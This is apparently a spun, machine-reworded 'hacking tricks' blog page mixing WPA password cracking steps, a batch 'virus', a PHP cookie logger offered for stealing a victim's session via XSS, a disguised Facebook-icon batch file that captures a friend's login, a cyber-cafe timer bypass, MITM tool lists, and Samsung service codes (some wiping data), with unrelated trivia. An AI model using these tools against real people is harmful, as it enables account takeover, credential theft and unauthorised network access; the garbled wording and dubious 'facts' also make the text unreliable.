Hi everyone, this is today i'm going to demonstrate to you industry standards to hack any wi-fi passwords utilizing backtrack 5

What We Need to hack Wi-fi Password?

1)Backtrack 5 [ R1 or R2]

2)Compatable Wi-fi Card

So Let's Start first open Terminal and afterward Follow My Steps :

1)In Terminal sort : airmon-ng there we can see interfaces

2)Then sort :airmon-ng begin wlan0 It must discovered proceses

3)then we write : airodump-ng mon0 it will begin filtering wi-fi systems

4)copy bssid and tpye : airodump-ng - c (channel) - w (document name) - (bssid) mon0

5)type : aireplay-ng - 0 5 - a (bssid) mon0

6)click on spots home folder drag in terminal wpa-01.cap in terminal and sort : aircrack-ng (file Directory) or drag document in

terminal

7)type in terminal : aircrack-ng (filename)*.cap - w (dictionary location) And Hit Enter!

Victory!

Rundown of Facebook Smiles/RageCodes

Must Try

*. To make a penguin<(")

*. Shark(^^^)

*. Shades8)

*. Tongue Sticking Out:P

*. Huge Smile:D

*. Heart <3

*. Surprised:O not zero

*. NormalSmile:)

*. Crying:'(

*. Miserable Face:(

*. Wink;)

*. Pacman:v

*. Chris Putnam:putnam:

*. Devil3:)

*. AngelO:) not zero

*. Robot:|] ( it is the key above enter, use shift)

*. Kiss:*

*. Wavy Lips:3

*. Squint-_-

*. Gaze DownO.o both are o not zeros

Check All Pending Friend Request In Facebook

FACEBOOK UPDATE : Now You Can Check All Requests Which You Sent To Others But Still Not Accepted. Then again We Can Say It As A How To Check Pending Friend Request In Facebook

Simply visit this connection;

Saturday, 16 July 2016

Virus : Folder inside Folder Trick

Infection that makes envelope inside organizer unendingly:-

Take after these strides:

1. Open Notepad and duplicate glue the accompanying code in it.

@echo off
:l
md lol
cd lol
goto l


2. Spare it on desktop with "virus.bat" or "anything.bat".

3. Double tap on this clump document to see its impact.

Best trick to hide your files


Instructions to Lock Folder ?

1. Open Notepad and Copy code given underneath into it.

cls
@ECHO OFF
title hacking tips and tricks
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== hacking goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

2. Save the scratch pad document as lock.bat (.bat is must)

3. Presently double tap on lock.bat and another envelope will be made with name MyFolder

4. Duplicate every one of your information you need to ensure in that New envelope

5. Presently double tap on lock.bat and when charge promp shows up Type Y and press enter.

6. Presently MyFolder will be avoided you view, to get to that folde double tap on lock.bat

7. It will request secret word enter your watchword and done. (Default secret word is hacking)

To change the secret word supplant coolhacks with new watchword in the above code.

Companions today we will highlight 12 fascinating PC Facts that you won't not know it some time recently,

Lets see...

1)Over 6,000 new PC infections are discharged each month.

2)The first PC mouse, developed in 1964, was made out of wood.(by Doug Engelbart)

3)The normal individual squints 20 times each moment – however just 7 times each moment when utilizing a PC.

4)The first electro-mechanical PC was produced in 1939.

5)By the end of 2012 there will be 17 billion gadgets associated with the web.

6)5 out of each 6 web pages are porn related.

7)Over 1 million area names are enrolled each month.

8)With it's 800 million interent clients, Facebook would be the third biggest nation in the World.

9)The first hard drive was made in 1979 and could hold 5MB of information.

10)The nVidia GeForce 6800 Ultra video card contains 222 million transistors.

11)20% of online infections are discharged by sorted out wrongdoing units.

12)The designers who built up the IBM PC were known as "The Dirty Dozen"

Presently the hold up has been over... [[The Voted trick]]

Step by step instructions to Use Multiple Whatsapp Accounts In One Device

*******************************************************************************

Android is one of the generally utilized open source Operating System and principle a portion of this prevalence is a direct result of a large number of utilizations through which we can do every last errand. One of the acclaimed use of Android stage is WhatsApp and it is one of the popular application for informing administration. You can talk with your friends and family free of expense with this marvelous application however imagine a scenario where you have 2 numbers and a solitary Android bolstered cellular telephone ?. . Authoritatively you can't utilize various numbers in one Whatsapp account yet here we are going to guide you about recently dispatched android application which permits you to utilize numerous records in one gadget.

OGWhatsapp [http://www.mediafire.com/download/96905wuoshd84mi/OGWhatsApp+v2.11.152.apk] is brilliant Android application which permits us to utilize various Whatsapp accounts in one android gadget.

[[Note : This Application is not authorized by Google so you can't discover it in Google Play store.]]

This application is a changed variant of whatsapp which help you to utilize numerous whatsapp accounts in one gadget. You don't need to pull your gadget for utilizing this application.

Ventures To Use :

*At to start with, download OGWhatsapp from above given download join.

*Now before introducing it in your gadget, take a reinforcement of your everything messages.

*Now reinstall official Whatsapp Messenger ( Just introduce it, no compelling reason to setup your number now ).

*Finally goto SD Card - Select Whatsapp - Rename it as OGWhatsApp.

*Now open OGWhatsapp which you have introduced in second step and check your old number.

*Lastly open authority Whatsapp and check your new number.

*Its Done Now !! You have effectively included 2 Whatsapp accounts in one gadget.

Trust you learn new trap of Android subsequent to tailing this instructional exercise.

Most used Passwords

· 123456

· Password

· 12345678

· Lifehack

· qwerty

· abc123

· 111111

· monkey

· purchaser

· 12345

· Letmein

· trustno1

· mythical serpent

· 1234567

· kotaku

· Baseball

· superman

· iloveyou

· gizmodo

· web

· Sunshine

· 1234

· princess

· starwars

· whatever

· Shadow

· cheddar

· 123123

· nintendo

· football

· Computer

· f- - you

· 654321

· blahblah

· passw0rd

· expert

· soccer

· michael

· 666666

· jennifer

· ogler

· watchword

· jordan

· pokemon

· michelle

· executioner

· pepper

· welcome

· batman

Man in the Middle (MITM) Attacks

For some of you, MITM assaults might be another idea so here is brief portrayal. In the event that a workstation is speaking with a server, and you are steering activity between them, then you are the MITM. It's an extraordinary position to be in for observing and controlling activity. There are heaps of approaches to procure a MITM position utilizing a scope of convention assaults. To kick you off, I've given a rundown of 10 conventions and instruments for assaulting frameworks on a LAN.

- >> Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds

- >> NetBIOS Name Service (NBNS): MetaSploit and responder

- >> Link-nearby Multicast Name Resolution (LLMNR): MetaSploit and responder

- >> Pre-Execution Environment (PXE): MetaSploit

- >> Dynamic Trunking Protocol (DTP): Yersinia

- >>Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia module)

- >> Hot Stand-by Router Protocol (HSRP): Yersinia

- >> Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup

- >> Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPack

- >> VLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig

5 BEST WAYS TO BECOME SUCCESSFUL PENETRATION TESTER :-

1. Require little commitments and Hard Work

2. Get L | PT [Licensed Penetration Tester] Certified

3. Learn Programming/Networking

4. Learn [Hacking] Common Vulnerabilities, Attacks and Defense

5. Switch to Linux from Windows/Mac

Additional Tips:

"Never at any point Give up While learning"

"Go for (CTF - Capture The Flag) and go to classes Hacking"

"Hacking join Forums and Blogs"

"Perused OWASP, Defcon and Black Hat's Documentation"

PC hacking is the activity of one

unlawfully accessing a PC or

system. Individuals occupied with this action

are known as Hackers and they change

the PC equipment and programming to

achieve an objective outside of the proprietors

unique reason.

Step by step instructions to Set Pattern Lock In Computer Like Android

********************************************************************************

These days for the most part Android bolstered gadgets are accompanies design lock innovation and it is one of the decent and most recent approach to open screen of versatile. In any case, did you ever thought to attempt this example lock in your PC ? if not then in the wake of tailing this post, you will have the capacity to set example lock in your PC simply like Android gadgets. You can apply this example lock in Windows Operating System like Windows XP, 7 and 8.

Here we are simply going to show you one little windows bolstered use of example lock which is anything but difficult to utilize and secured as well. You can set this example lock after primary secret word screen of your PC likewise with the goal that it will include additional layer of security in your PC.

Eusing Maze Lock (http://www.mediafire.com/download/5wznxq613i5j27x/EMLSetup.exe) is recently dispatched windows upheld application which is little in size yet its work is thoroughly secure in light of the fact that by utilizing this example lock as a part of your PC, you can include additional layer of security so that nobody can figure and break your secret word.

Highlights :

*Automatically Lock on Startup.

*Wrong secret word will alarm you with siren sound.

*You can set message according to your decision on Lock screen.

*You can set foundation picture according to your decision.

Ventures To Use :

*Firstly Download this application by tapping on this Link(http://www.mediafire.com/download/5wznxq613i5j27x/EMLSetup.exe) .

*Now you can Eusing Maze Lock design window where we need to spare a few settings.

*Here you can set parcel of things like Reset, reinforcement and example style focuses.

Set example according to your decision by dragging your mouse and in the event that you need to take reinforcement of your example then select " Backup Pattern ". Reinforcement example will be recovery in BMP organize so that on the off chance that you overlook your example then you can undoubtedly check it.

*Finally tap on General tab and change the Auto lock in windows startup to ON.

*You can compose your custom message in message box beneath settings which you will have the capacity to find in lock screen.

*Finally Click OK and its Done !!

Trust you cherished this better approach for lock.



Hi Everyone . Today i am going to share a few scripts that can help you while XXS ing a site . It is a Cookie taking script . That can hack your casualties treat record and it will permit you to sign in as the site administrator .

STEPS :-

1. Duplicate any of the underneath given script and spare it as a .php record

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookielog.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>

2. Upolad this php script to a free facilitating site .

3. Pass this connection to you casualty .

4. In the event that he taps on this connection you will get all his treat points of interest as cookielog.txt

5. Login to his accnt .

!!! Enjoy HACKING !!!

It is just for entertainment only and instructive purpose.You might be followed by this be careful before attempting.

World's Top 10 Hackers :

1.Gary McKinnon

2.Robert Tappan Morris

3.Kevin David Mitnick

4.Kevin Poulsen

5.Jonathan James

6.Adrian Lamo

7.Vladimir Levin

8.Raphael Gray

9.Deceptive Duo

10.Michael Calce



Wednesday, 13 July 2016

The simplest way of hacking facebook account

As I said Earlier here is a straightforward Trick to Hack a FB account utilizing social Engineering. Utilize your Brain to trap the Victim into this Trap and get his or Her ID with Pswd.

The most straightforward method for hacking facebook account

1. open notebook and duplicate this codes

>>>> @echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >Log.txt
start www.facebook.com
exit <<<<


2.save it as anything.bat

3. click on your c disk and make a record named logs.

4. presently make an alternate way document of that bat.

5.then right tap on the alternate way one and snap on properties

furthermore, change the symbol (u can download a facebook symbol from here http://www.iconarchive.com/search?q=facebook )

6.now send the bat record to your companion and say anything and make him to login through the bat document and after that the pass and email will come in the folder( logs )


COOL MAGIC CIRCLES ON FACEBOOK


This is truly basic, however I concede I didn't get this the first run through.

This cool enchantment hovers showing up on your page is only one of the numerous mystery traps you'll discover in Facebook. You might need to try this out.

Here's the means by which:

press Up, Up, Down, Down, Left, Right, Left, Right, B, An, Enter key then press up and down.

NOTE: Now, just in the event that it doesn't chip away at your first attempt, take a stab at reloading your page again by squeezing F5 and rehash the procedure.

Trick to Disable Timer in Cyber Cafe

Incapacitate Time limit in Cyber Cafe and use

boundless Internet

- - -

- -

Okay , Were Gonna Learn How To Disable

The Timer On The Computers On In Internet

Cafe's. Okay Create A New Text

Document,Than Type CMD In It, And Than

Spare It As a Batch File, And Than Run The

New Batch File On Your Desktop.

Than Command Prompt Should Open, Now

You Type "cd\windows" to change the

catalog to Windows, than sort in "regedit"

to get to the registry editorial manager gui, than

explore to

"HKEY_CURRENT_USER>Appevents>s

oftware>classes>

microsoft>windows>current

version>internet

settings>policies>system" than on the privilege

sheet where it says Disable Taskmanager,

right

clickon it, and look down to alter, and

than

change the estimation of it to "0", and than open

Windows Task Manager By Holding Down

These Keys, "CTRL+ALT+DEL/DELETE" And

Than DisableThe Internet Cafe's Timer, And

UNLIMTED TIME.

Important Codes For Samsung Users

SAMSUNG MOBILE CODES:-

*#1111# S/W Version

*#1234# Firmware Version

*#2222# H/W Version

*#8999*8376263# All Versions Together

________________________________________

*#8999*8378# Test Menu

*#4777*8665# GPSR Tool

*#8999*523# LCD Brightness

*#8999*377# Error Menu

*#8999*327# EEP Menu

*#8999*3825523# Don't Know.

*#8999*667# Debug Mode

*#92782# PhoneModel (Wap)

#*5737425# JAVA Mode

*#2255# Call List

*#232337# Bluetooth MAC Adress

*#5282837# Java Version

________________________________________

#*4773# Incremental Redundancy

#*7752# 8 PSK uplink capacity bit

#*7785# Reset wakeup and RTK clock cariables/variables

#*1200# ?

#*7200# Tone Generator Mute

#*3888# BLUETOOTH Test mode

#*#8999*324# ??

#*7828# Task screen

#*5111# ??

#*#8377466# S/W Version and H/W Version

#*2562# Restarts Phone

#*2565# No Blocking? General Defense.

#*3353# General Defense, Code Erased.

#*3837# Phone Hangs on White screen

#*3849# Restarts Phone

#*3851# Restarts Phone

#*3876# Restarts Phone

#*7222# Operation Typ: (Class C GSM)

#*7224# !!! Blunder !!!

#*7252# Operation Typ: (Class B GPRS)

#*7271# CMD: (Not Available)

#*7274# CMD: (Not Available)

#*7337# Restarts Phone (Resets Wap Settings)

#*2787# CRTP ON/OFF

#*2886# AutoAnswer ON/OFF

________________________________________

#*3737# L1 AFC

#*5133# L1 HO Data

#*7288# GPRS Detached/Attached

#*7287# GPRS Attached

#*7666# White Screen

#*7693# Sleep Deactivate/Activate

#*7284# L1 HO Data

#*2256# Calibration information? (For CMD set DEBUGAUTONOMY in cihard.opt)

#*2286# Databattery

#*2527# GPRS changing set to (Class 4, 8, 9, 10)

#*2679# Copycat highlight Activa/Deactivate

#*3940# External looptest 9600 bps

#*4263# Handsfree mode Activate/Deactivate

#*4700# Please utilize capacity 2637

#*7352# BVMC Reg esteem (LOW_SWTOFF, NOMINAL_SWTOFF)

#*2558# Time ON

#*3370# Same as 4700

#*3941# External looptest 115200 bps

#*5176# L1 Sleep

#*7462# SIM Phase

#*7983# Voltage/Freq

#*7986# Voltage

#*8466# Old Time

#*2255# Call Failed

#*5187# L1C2G follow Activate/Deactivate

#*5376# DELETE ALL SMS!!!!

#*6837# Official Software Version: (0003000016000702)

#*2337# Permanent Registration Beep

________________________________________

#*2474# Charging Duration

#*2834# Audio Path (Handsfree)

#*3270# DCS Support Activate/Deactivate

#*3282# Data Activate/Deactivate

#*3476# EGSM Activate/Deactivate

#*3676# FORMAT FLASH VOLUME!!!

#*4760# GSM Activate/Deactivate

#*4864# White Screen

#*5171# L1P1

#*5172# L1P2

#*5173# L1P3

#*7326# Accessory

#*7683# Sleep variable

#*8465# Time in L1

#*2252# Current CAL

#*2836# AVDDSS Management Activate/Deactivate

#*3877# Dump of SPY follow

#*7728# RSAV

#*2677# Same as 4700

#*3797# Blinks 3D030300 in RED

#*3728# Time 2 Decod

#*3725# B4 last off

#*7372# Resetting the opportunity to DPB variables

#*7732# Packet stream setting bit Activate/Deactivate

#*6833# New uplink foundation Activate/Deactivate

#*3273# EGPRS multislot (Class 4, 8, 9, 10)

#*7722# RLC bitmap pressure Activate/Deactivate

#*2351# Blinks 1347E201 in RED

#*4472# Hysteresis of serving cell: 3 dB

#*2775# Switch to 2 inward speaker

#*9270# Force WBS

#*7878# FirstStartup (0=NO, 1=YES)

#*3757# DSL UART speed set to (LOW, HIGH)

#*8726# Switches USBACM to Normal

#*8724# Switches USBACM to Generator mode

#*8727# Switches USBACM to Slink mode

#*8725# Switches USBACM to Loop-back mode

#*3838# Blinks 3D030300 in RED

#*2077# GPRS Switch

#*2027# GPRS Switch

#*0227# GPRS Switch

_____________________

#*22674# Resume REC

#*22675# AMR Playback

#*22676# AMR Stop Play

#*22677# Pause Play

#*22678# Resume Play

#*77261# PCM Rec Req

#*77262# Stop PCM Rec

#*77263# PCM Playback

#*77264# PCM Stop Play

#*2872# CNT

*#8999*283#

#*22679# AMR Get Time

*288666#

*2886633#

*#8999*364# Watchdog ON/OFF

#*8370# Tfs4.0 Test 0

#*8371# Tfs4.0 Test 1

#*8372# Tfs4.0 Test 2

#*8373# Tfs4.0 Test 3

#*8374# Tfs4.0 Test 4

#*8375# Tfs4.0 Test 5

#*8376# Tfs4.0 Test 6

#*8377# Tfs4.0 Test 7

#*8378# Tfs4.0 Test 8

#*8379# Tfs4.0 Test 9

#837837# error=...

________________________________________

*2767*3855# = E2P Full Reset

*2767*2878# = E2P Custom Reset

*2767*927# = E2P Wap Reset

*2767*226372# = E2P Camera Reset

*2767*688# Reset Mobile TV

#7263867# = RAM Dump (On or Off)

*2767*49927# = Germany WAP Settings

*2767*44927# = UK WAP Settings

*2767*31927# = Netherlands WAP Settings

*2767*420927# = Czech WAP Settings

*2767*43927# = Austria WAP Settings

*2767*39927# = Italy WAP Settings

*2767*33927# = France WAP Settings

*2767*351927# = Portugal WAP Settings

*2767*34927# = Spain WAP Settings

*2767*46927# = Sweden WAP Settings

*2767*380927# = Ukraine WAP Settings

*2767*7927# = Russia WAP Settings

*2767*30927# = GREECE WAP Settings

*2767*73738927# = WAP Settings Reset

*2767*49667# = Germany MMS Settings

*2767*44667# = UK MMS Settings

*2767*31667# = Netherlands MMS Settings

*2767*420667# = Czech MMS Settings

*2767*43667# = Austria MMS Settings

*2767*39667# = Italy MMS Settings

*2767*33667# = France MMS Settings

*2767*351667# = Portugal MMS Settings

*2767*34667# = Spain MMS Settings

*2767*46667# = Sweden MMS Settings

*2767*380667# = Ukraine MMS Settings

*2767*7667#. = Russia MMS Settings

*2767*30667# = GREECE MMS Settings